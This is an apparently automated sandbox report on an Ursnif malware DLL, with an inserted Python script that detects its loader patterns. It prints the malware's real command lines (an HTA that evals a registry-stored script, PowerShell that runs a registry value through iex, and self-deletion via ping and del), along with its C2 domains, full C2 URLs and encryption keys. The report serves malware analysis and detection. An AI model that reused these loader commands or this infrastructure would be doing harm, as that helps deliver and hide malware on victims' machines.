
Windows Analysis Report 2u2mgtylJy.dll

Overview

General Information

Sample Name: 2u2mgtylJy.dll
Analysis ID: 498331
MD5: 503edcfec2262373e36deaa37f640332
SHA1: 37648e8ced69d8adc7be8bde5a61138cbb0f9e6a
SHA256: 3ef3beaa49e07f171927a772a417109df6f137c4fa321dbd17daaa7cb47392be
Tags: dll

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Encoded IEX
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Suspicious powershell command line found
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7044 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7056 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7076 cmdline: rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6268 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7136 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7160 cmdline: rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 2988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 6260 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6104 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3912 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 488 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4436 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5080 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3212 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3248 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6908 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(showing 5 of 55 entries)

Unpacked PEs

Source | Rule | Description | Author
6.3.rundll32.exe.2f18cd6.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
6.2.rundll32.exe.31b0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
0.2.loaddll32.exe.f30000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
5.3.rundll32.exe.4ad8cd6.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.595a4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security
(showing 5 of 16 entries)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6104, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline', ProcessId: 3912
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132780622454425957.6104.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6260, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 6104
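All of the Sigma hits above fire on the same two command lines: mshta.exe evaluating an inline HTA that RegReads a value, and the PowerShell it spawns reading a sibling value of the same key and piping it into Invoke-Expression. As an added example (not code from the report or from Joe Security), the Python below applies equivalent logic to process-creation records and recovers the registry key and value names an incident responder would export: the `DeviceFile` value read by mshta.exe and the `UtilTool` value read by powershell.exe. It also covers the `ping … && del` self-deletion from the process tree. The event records are constructed from the command lines in the report's process tree, with Sysmon-style field names (Image, CommandLine, ParentImage, ParentCommandLine) as used in the Sigma data above; the rule names are my own.

```python
"""Apply the report's Sigma logic to process-creation records (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample events: copied from the report's process tree, plus one
# benign interactive PowerShell launch for contrast.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {
        "ProcessId": 6104,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex "
            r"([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow"
            r"\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"
        ),
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "ParentCommandLine": (
            r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';"
            r"resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow"
            r"\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));"
            r"if(!window.flag)close()</script>'"
        ),
    },
    {   # benign: an administrator reading a key by hand
        "ProcessId": 4242,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe Get-ItemProperty 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion'",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
    },
    {
        "ProcessId": 4436,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
    },
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# PowerShell feeding a registry value to Invoke-Expression: capture key and value name.
PS_IEX_FROM_REGISTRY = re.compile(
    r"\b(?:iex|invoke-expression)\b.*?\b(?:gp|get-itemproperty)\s+'?(HK(?:CU|LM|U|CR|CC)[^'\s]+)'?\)?\.(\w+)",
    re.IGNORECASE | re.DOTALL,
)
# WScript.Shell RegRead inside an inline HTA.
HTA_REGREAD = re.compile(r"regread\(\s*'([^']+)'", re.IGNORECASE)
# Delay-then-delete: the classic self-removal one-liner.
PING_THEN_DEL = re.compile(r"\bping\b[^&]*&&\s*del\s+'?([^']+)'?", re.IGNORECASE)


@dataclass
class Finding:
    process_id: int
    rule: str
    registry_key: Optional[str] = None
    value_name: Optional[str] = None
    detail: Optional[str] = None


def _image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _unescape_js_path(key: str) -> str:
    # Inside the HTA the key is a JScript string literal, so runs of
    # backslashes collapse to a single separator.
    return re.sub(r"\\+", r"\\", key)


def analyze_event(ev: Dict[str, object]) -> List[Finding]:
    findings: List[Finding] = []
    pid = int(ev["ProcessId"])
    child, parent = _image_name(str(ev["Image"])), _image_name(str(ev["ParentImage"]))
    cmd = str(ev["CommandLine"])

    if parent == "mshta.exe" and child in SHELLS:
        f = Finding(pid, "mshta_spawning_windows_shell")
        m = HTA_REGREAD.search(str(ev["ParentCommandLine"]))
        if m:  # split "HKCU\...\Key\Value" into key and value name
            f.registry_key, _, f.value_name = _unescape_js_path(m.group(1)).rpartition("\\")
        findings.append(f)

    if child in ("powershell.exe", "pwsh.exe"):
        m = PS_IEX_FROM_REGISTRY.search(cmd)
        if m:
            findings.append(Finding(pid, "powershell_iex_from_registry",
                                    registry_key=m.group(1), value_name=m.group(2)))

    if child == "cmd.exe":
        m = PING_THEN_DEL.search(cmd)
        if m:
            findings.append(Finding(pid, "self_delete_via_ping_del", detail=m.group(1)))
    return findings


def analyze(events: List[Dict[str, object]]) -> List[Finding]:
    return [f for ev in events for f in analyze_event(ev)]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

`analyze(SAMPLE_EVENTS)` returns three findings, two for PID 6104 and one for PID 4436, and nothing for the benign launch. Both registry findings point at the same `HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550` key; on a live host that key is the thing to export before cleanup, because the PowerShell command line converts the `UtilTool` bytes with `ASCII.GetString`, so the stored stage is script text in raw bytes rather than a base64 string, and the csc.exe children in the process tree are what that script compiles.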

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://init.icecreambob.com/c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng | Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN | Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 | Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK | Avira URL Cloud: Label: malware
